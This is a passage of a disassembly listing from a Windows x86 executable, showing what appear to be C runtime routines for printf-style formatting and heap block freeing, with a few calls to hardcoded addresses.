or byte ptr [ebp+var_4+1], 8
loc_4195FE: ; CODE XREF: sub_419343+2B5�j
; sub_419343+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_419645
call sub_419B3F
push eax
lea eax, [ebp+var_248]
push eax
call sub_41D68B
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_419658
mov [ebp+var_28], 1
jmp short loc_419658
; ---------------------------------------------------------------------------
loc_41962F: ; CODE XREF: sub_419343+1FB�j
sub eax, 5Ah
jz short loc_419666
sub eax, 9
jz short loc_4195FE
dec eax
jz loc_419828
jmp loc_41994D
; ---------------------------------------------------------------------------
loc_419645: ; CODE XREF: sub_419343+2C5�j
call sub_419B22
pop ecx
mov [ebp+var_248], al
mov [ebp+var_C], 1
loc_419658: ; CODE XREF: sub_419343+2E1�j
; sub_419343+2EA�j
lea eax, [ebp+var_248]
mov [ebp+var_8], eax
jmp loc_41994D
; ---------------------------------------------------------------------------
loc_419666: ; CODE XREF: sub_419343+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_419B22
test eax, eax
pop ecx
jz short loc_4196A7
mov ecx, [eax+4]
test ecx, ecx
jz short loc_4196A7
test byte ptr [ebp+var_4+1], 8
jz short loc_419698
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_41994D
; ---------------------------------------------------------------------------
loc_419698: ; CODE XREF: sub_419343+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_41994A
; ---------------------------------------------------------------------------
loc_4196A7: ; CODE XREF: sub_419343+32F�j
; sub_419343+336�j
mov eax, off_43B598
mov [ebp+var_8], eax
push eax
jmp loc_419743
; ---------------------------------------------------------------------------
loc_4196B5: ; CODE XREF: sub_419343+29D�j
jnz short loc_4196C3
cmp bl, 67h
jnz short loc_4196C3
mov [ebp+var_10], 1
loc_4196C3: ; CODE XREF: sub_419343+2AA�j
; sub_419343:loc_4196B5�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+var_248]
push eax
lea eax, [ebp+var_48]
push eax
call off_43B8C8
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_419715
cmp [ebp+var_10], 0
jnz short loc_419715
lea eax, [ebp+var_248]
push eax
call off_43B8D4
pop ecx
loc_419715: ; CODE XREF: sub_419343+3BC�j
; sub_419343+3C2�j
cmp bl, 67h
jnz short loc_41972C
test esi, esi
jnz short loc_41972C
lea eax, [ebp+var_248]
push eax
call off_43B8CC
pop ecx
loc_41972C: ; CODE XREF: sub_419343+3D5�j
; sub_419343+3D9�j
cmp [ebp+var_248], 2Dh
jnz short loc_419742
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_419742: ; CODE XREF: sub_419343+3F0�j
push edi
loc_419743: ; CODE XREF: sub_419343+36D�j
call sub_417AF0
pop ecx
jmp loc_41994A
; ---------------------------------------------------------------------------
loc_41974E: ; CODE XREF: sub_419343+1E9�j
sub eax, 69h
jz loc_419828
sub eax, 5
jz loc_4197FE
dec eax
jz loc_4197EB
dec eax
jz short loc_4197BB
sub eax, 3
jz loc_419570
dec eax
dec eax
jz loc_41982C
sub eax, 3
jnz loc_41994D
mov [ebp+var_2C], 27h
jmp short loc_4197C9
; ---------------------------------------------------------------------------
loc_41978D: ; CODE XREF: sub_419343+270�j
; sub_419343+27A�j
sub eax, ecx
sar eax, 1
jmp loc_41994A
; ---------------------------------------------------------------------------
loc_419796: ; CODE XREF: sub_419343+24F�j
test ecx, ecx
jnz short loc_4197A3
mov ecx, off_43B598
mov [ebp+var_8], ecx
loc_4197A3: ; CODE XREF: sub_419343+455�j
mov eax, ecx
loc_4197A5: ; CODE XREF: sub_419343+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_4197B4
cmp byte ptr [eax], 0
jz short loc_4197B4
inc eax
jmp short loc_4197A5
; ---------------------------------------------------------------------------
loc_4197B4: ; CODE XREF: sub_419343+467�j
; sub_419343+46C�j
sub eax, ecx
jmp loc_41994A
; ---------------------------------------------------------------------------
loc_4197BB: ; CODE XREF: sub_419343+425�j
mov [ebp+var_10], 8
loc_4197C2: ; CODE XREF: sub_419343+201�j
mov [ebp+var_2C], 7
loc_4197C9: ; CODE XREF: sub_419343+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_419833
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_419833
; ---------------------------------------------------------------------------
loc_4197EB: ; CODE XREF: sub_419343+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_419833
or byte ptr [ebp+var_4+1], 2
jmp short loc_419833
; ---------------------------------------------------------------------------
loc_4197FE: ; CODE XREF: sub_419343+417�j
lea eax, [ebp+arg_8]
push eax
call sub_419B22
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_419817
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_41981C
; ---------------------------------------------------------------------------
loc_419817: ; CODE XREF: sub_419343+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_41981C: ; CODE XREF: sub_419343+4D2�j
mov [ebp+var_28], 1
jmp loc_419A4B ; default
; ---------------------------------------------------------------------------
loc_419828: ; CODE XREF: sub_419343+2F7�j
; sub_419343+40E�j
or [ebp+var_4], 40h
loc_41982C: ; CODE XREF: sub_419343+432�j
mov [ebp+var_C], 0Ah
loc_419833: ; CODE XREF: sub_419343+491�j
; sub_419343+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_419845
lea eax, [ebp+arg_8]
push eax
call sub_419B2F
pop ecx
jmp short loc_419886
; ---------------------------------------------------------------------------
loc_419845: ; CODE XREF: sub_419343+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_41986C
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_419861
call sub_419B22
pop ecx
movsx eax, ax
loc_41985E: ; CODE XREF: sub_419343+527�j
; sub_419343+539�j
cdq
jmp short loc_419886
; ---------------------------------------------------------------------------
loc_419861: ; CODE XREF: sub_419343+510�j
call sub_419B22
pop ecx
movzx eax, ax
jmp short loc_41985E
; ---------------------------------------------------------------------------
loc_41986C: ; CODE XREF: sub_419343+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_41987E
call sub_419B22
pop ecx
jmp short loc_41985E
; ---------------------------------------------------------------------------
loc_41987E: ; CODE XREF: sub_419343+531�j
call sub_419B22
pop ecx
xor edx, edx
loc_419886: ; CODE XREF: sub_419343+500�j
; sub_419343+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_4198A7
test edx, edx
jg short loc_4198A7
jl short loc_419896
test eax, eax
jnb short loc_4198A7
loc_419896: ; CODE XREF: sub_419343+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_4198AB
; ---------------------------------------------------------------------------
loc_4198A7: ; CODE XREF: sub_419343+547�j
; sub_419343+54B�j ...
mov esi, eax
mov edi, edx
loc_4198AB: ; CODE XREF: sub_419343+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_4198B4
and edi, 0
loc_4198B4: ; CODE XREF: sub_419343+56C�j
cmp [ebp+var_10], 0
jge short loc_4198C3
mov [ebp+var_10], 1
jmp short loc_4198C7
; ---------------------------------------------------------------------------
loc_4198C3: ; CODE XREF: sub_419343+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_4198C7: ; CODE XREF: sub_419343+57E�j
mov eax, esi
or eax, edi
jnz short loc_4198D1
and [ebp+var_1C], 0
loc_4198D1: ; CODE XREF: sub_419343+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_4198D7: ; CODE XREF: sub_419343+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_4198E7
mov eax, esi
or eax, edi
jz short loc_419922
loc_4198E7: ; CODE XREF: sub_419343+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_4189C0
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_418A40
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_419918
add ebx, [ebp+var_2C]
loc_419918: ; CODE XREF: sub_419343+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_4198D7
; ---------------------------------------------------------------------------
loc_419922: ; CODE XREF: sub_419343+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_41994D
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_419940
test eax, eax
jnz short loc_41994D
loc_419940: ; CODE XREF: sub_419343+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_41994A: ; CODE XREF: sub_419343+35F�j
; sub_419343+406�j ...
mov [ebp+var_C], eax
loc_41994D: ; CODE XREF: sub_419343+21B�j
; sub_419343+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_419A4B ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_419985
test bh, 1
jz short loc_41996A
mov [ebp+var_16], 2Dh
jmp short loc_41997E
; ---------------------------------------------------------------------------
loc_41996A: ; CODE XREF: sub_419343+61F�j
test bl, 1
jz short loc_419975
mov [ebp+var_16], 2Bh
jmp short loc_41997E
; ---------------------------------------------------------------------------
loc_419975: ; CODE XREF: sub_419343+62A�j
test bl, 2
jz short loc_419985
mov [ebp+var_16], 20h
loc_41997E: ; CODE XREF: sub_419343+625�j
; sub_419343+630�j
mov [ebp+var_1C], 1
loc_419985: ; CODE XREF: sub_419343+61A�j
; sub_419343+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
jnz short loc_4199A5
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_419AB9
add esp, 10h
loc_4199A5: ; CODE XREF: sub_419343+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_419AEA
add esp, 10h
test bl, 8
jz short loc_4199D7
test bl, 4
jnz short loc_4199D7
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_419AB9
add esp, 10h
loc_4199D7: ; CODE XREF: sub_419343+67B�j
; sub_419343+680�j
cmp [ebp+var_24], 0
jz short loc_419A1E
cmp [ebp+var_C], 0
jle short loc_419A1E
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_4199EC: ; CODE XREF: sub_419343+6D7�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_38]
push eax
inc ebx
call sub_41D68B
pop ecx
test eax, eax
pop ecx
jle short loc_419A33
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_419AEA
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_4199EC
jmp short loc_419A33
; ---------------------------------------------------------------------------
loc_419A1E: ; CODE XREF: sub_419343+698�j
; sub_419343+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_419AEA
add esp, 10h
loc_419A33: ; CODE XREF: sub_419343+6BC�j
; sub_419343+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_419A4B ; default
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_419AB9
add esp, 10h
loc_419A4B: ; CODE XREF: sub_419343+68�j
; sub_419343+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_41936F
loc_419A5C: ; CODE XREF: sub_419343+1F�j
; sub_419343+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_419343 endp
; ---------------------------------------------------------------------------
off_419A64 dd offset loc_4194E2 ; DATA XREF: sub_419343+6E�r
dd offset loc_4193B8 ; jump table for switch statement
dd offset loc_4193D3
dd offset loc_41941F
dd offset loc_419456
dd offset loc_41945E
dd offset loc_419493
dd offset loc_419526
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A84 proc near ; CODE XREF: sub_419343+1BD�p
; sub_419343+1D6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_419A9D
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_419AA8
; ---------------------------------------------------------------------------
loc_419A9D: ; CODE XREF: sub_419A84+9�j
push ecx
push [ebp+arg_0]
call sub_41922E
pop ecx
pop ecx
loc_419AA8: ; CODE XREF: sub_419A84+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_419AB5
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419AB5: ; CODE XREF: sub_419A84+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_419A84 endp
; =============== S U B R O U T I N E =======================================
sub_419AB9 proc near ; CODE XREF: sub_419343+65A�p
; sub_419343+68C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_419AE7
mov esi, [esp+8+arg_C]
loc_419ACA: ; CODE XREF: sub_419AB9+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_419A84
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_419AE7
mov eax, edi
dec edi
test eax, eax
jg short loc_419ACA
loc_419AE7: ; CODE XREF: sub_419AB9+B�j
; sub_419AB9+25�j
pop edi
pop esi
retn
sub_419AB9 endp
; =============== S U B R O U T I N E =======================================
sub_419AEA proc near ; CODE XREF: sub_419343+670�p
; sub_419343+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_419B1E
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_419B00: ; CODE XREF: sub_419AEA+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_419A84
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_419B1E
mov eax, ebx
dec ebx
test eax, eax
jg short loc_419B00
loc_419B1E: ; CODE XREF: sub_419AEA+C�j
; sub_419AEA+2B�j
pop edi
pop esi
pop ebx
retn
sub_419AEA endp
; =============== S U B R O U T I N E =======================================
sub_419B22 proc near ; CODE XREF: sub_419343+E5�p
; sub_419343+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_419B22 endp
; =============== S U B R O U T I N E =======================================
sub_419B2F proc near ; CODE XREF: sub_419343+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_419B2F endp
; =============== S U B R O U T I N E =======================================
sub_419B3F proc near ; CODE XREF: sub_419343+2C7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_419B3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B4D proc near ; CODE XREF: sub_417894+17�p
; sub_417894+58�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_419B6B
mov ecx, off_43B5A0
movzx eax, word ptr [ecx+eax*2]
jmp short loc_419BBD
; ---------------------------------------------------------------------------
loc_419B6B: ; CODE XREF: sub_419B4D+10�j
mov ecx, eax
push esi
mov esi, off_43B5A0
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_419B90
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_419B99
; ---------------------------------------------------------------------------
loc_419B90: ; CODE XREF: sub_419B4D+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_419B99: ; CODE XREF: sub_419B4D+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_41D6F3
add esp, 1Ch
test eax, eax
jnz short loc_419BB9
leave
retn
; ---------------------------------------------------------------------------
loc_419BB9: ; CODE XREF: sub_419B4D+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_419BBD: ; CODE XREF: sub_419B4D+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_419B4D endp
; =============== S U B R O U T I N E =======================================
sub_419BC2 proc near ; CODE XREF: sub_417C00+1F�p
; sub_418C3F+106�p ...
arg_0 = dword ptr 4
mov eax, dword_5158E0
test eax, eax
jz short loc_419BDA
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_419BDA
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_419BDA: ; CODE XREF: sub_419BC2+7�j
; sub_419BC2+12�j
xor eax, eax
retn
sub_419BC2 endp
; ---------------------------------------------------------------------------
db 33h, 0C0h, 6Ah
dd 24443900h, 10006808h, 940F0000h, 0E89050C0h, 7C3F8FC2h
dd 0C0A3C085h, 7400516Eh, 17E815h, 0C0850000h, 35FF0F75h
dd 516EC0h, 72E6E890h, 0C0337C3Fh, 58016AC3h, 14068C3h
dd 6A0000h, 6EC035FFh, 0E8900051h, 7C4F69A8h, 0BCA3C085h
dd 7500516Eh, 2583C301h, 516EB4h, 0B8258300h, 516Eh, 0B0A3016Ah
dd 0C700516Eh, 516EA805h, 1000h
db 0, 58h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_419C57 proc near ; CODE XREF: sub_417C62+A�p
; sub_418C3F+3D�p
arg_0 = dword ptr 4
mov eax, dword_516EB8
lea ecx, [eax+eax*4]
mov eax, dword_516EBC
lea ecx, [eax+ecx*4]
loc_419C67: ; CODE XREF: sub_419C57+26�j
cmp eax, ecx
jnb short loc_419C7F
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_419C81
add eax, 14h
jmp short loc_419C67
; ---------------------------------------------------------------------------
loc_419C7F: ; CODE XREF: sub_419C57+12�j
xor eax, eax
locret_419C81: ; CODE XREF: sub_419C57+21�j
retn
sub_419C57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419C82 proc near ; CODE XREF: sub_417C62+16�p
; sub_418C3F+89�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_419D48
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_419CDA
mov [ebp+arg_4], edi
loc_419CDA: ; CODE XREF: sub_419C82+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_419D2C
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_419D08
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_419D2C
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_419D2C
; ---------------------------------------------------------------------------
loc_419D08: ; CODE XREF: sub_419C82+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_419D2C
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_419D2C: ; CODE XREF: sub_419C82+60�j
; sub_419C82+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_419D48: ; CODE XREF: sub_419C82+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_419D56
push 3Fh
pop edi
loc_419D56: ; CODE XREF: sub_419C82+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_419E05
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_419D81
mov [ebp+arg_4], edx
mov ecx, edx
loc_419D81: ; CODE XREF: sub_419C82+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_419D93
mov edi, edx
loc_419D93: ; CODE XREF: sub_419C82+10D�j
cmp ecx, edi
jz short loc_419E02
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_419DEA
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_419DC6
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_419DEA
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_419DEA
; ---------------------------------------------------------------------------
loc_419DC6: ; CODE XREF: sub_419C82+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_419DEA
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_419DEA: ; CODE XREF: sub_419C82+11E�j
; sub_419C82+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_419E02: ; CODE XREF: sub_419C82+113�j
mov edx, [ebp+var_8]
loc_419E05: ; CODE XREF: sub_419C82+DD�j
cmp [ebp+var_14], 0
jnz short loc_419E14
cmp [ebp+arg_4], edi
jz loc_419E9D
loc_419E14: ; CODE XREF: sub_419C82+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_419E9D
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_419E71
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_419E60
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_419E60: ; CODE XREF: sub_419C82+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_419E9A
; ---------------------------------------------------------------------------
loc_419E71: ; CODE XREF: sub_419C82+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_419E87
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_419E87: ; CODE XREF: sub_419C82+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_419E9A: ; CODE XREF: sub_419C82+1ED�j
mov ebx, [ebp+var_C]
loc_419E9D: ; CODE XREF: sub_419C82+18C�j
; sub_419C82+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_419FA8
mov eax, dword_516EB4
test eax, eax
jz loc_419F9A
mov ecx, dword_516EAC
mov edi, dword_4211A8
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call edi ; VirtualFree
mov ecx, dword_516EAC
mov eax, dword_516EB4
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_516EB4
mov ecx, dword_516EAC
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_516EB4
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_516EB4
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_419F28
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_516EB4
loc_419F28: ; CODE XREF: sub_419C82+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_419F9A
push ebx
push 0
push dword ptr [eax+0Ch]
call edi ; VirtualFree
mov eax, dword_516EB4
push dword ptr [eax+10h]
push 0
push dword_516EC0
nop
call near ptr 7C91043Dh
mov eax, dword_516EB8
mov edx, dword_516EBC
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_516EB4
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_41D840
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_516EB8
cmp eax, dword_516EB4
jbe short loc_419F8C
sub eax, 14h
loc_419F8C: ; CODE XREF: sub_419C82+305�j
mov ecx, dword_516EBC
mov dword_516EB0, ecx
jmp short loc_419F9D
; ---------------------------------------------------------------------------
loc_419F9A: ; CODE XREF: sub_419C82+233�j
; sub_419C82+2AA�j
mov eax, [ebp+arg_0]
loc_419F9D: ; CODE XREF: sub_419C82+316�j
mov dword_516EB4, eax
mov dword_516EAC, esi
loc_419FA8: ; CODE XREF: sub_419C82+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_419C82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419FAD proc near ; CODE XREF: sub_417C2C+E�p
; sub_418C3F+69�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_516EB8
mov edx, dword_516EBC
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_419FED
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_419FFD
; ---------------------------------------------------------------------------
loc_419FED: ; CODE XREF: sub_419FAD+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_419FFD: ; CODE XREF: sub_419FAD+3E�j
mov eax, dword_516EB0
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_41A024
loc_41A00B: ; CODE XREF: sub_419FAD+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41A024
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_41A00B
loc_41A024: ; CODE XREF: sub_419FAD+5C�j
; sub_419FAD+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_41A0A2
mov ebx, edx
loc_41A02B: ; CODE XREF: sub_419FAD+96�j
cmp ebx, eax
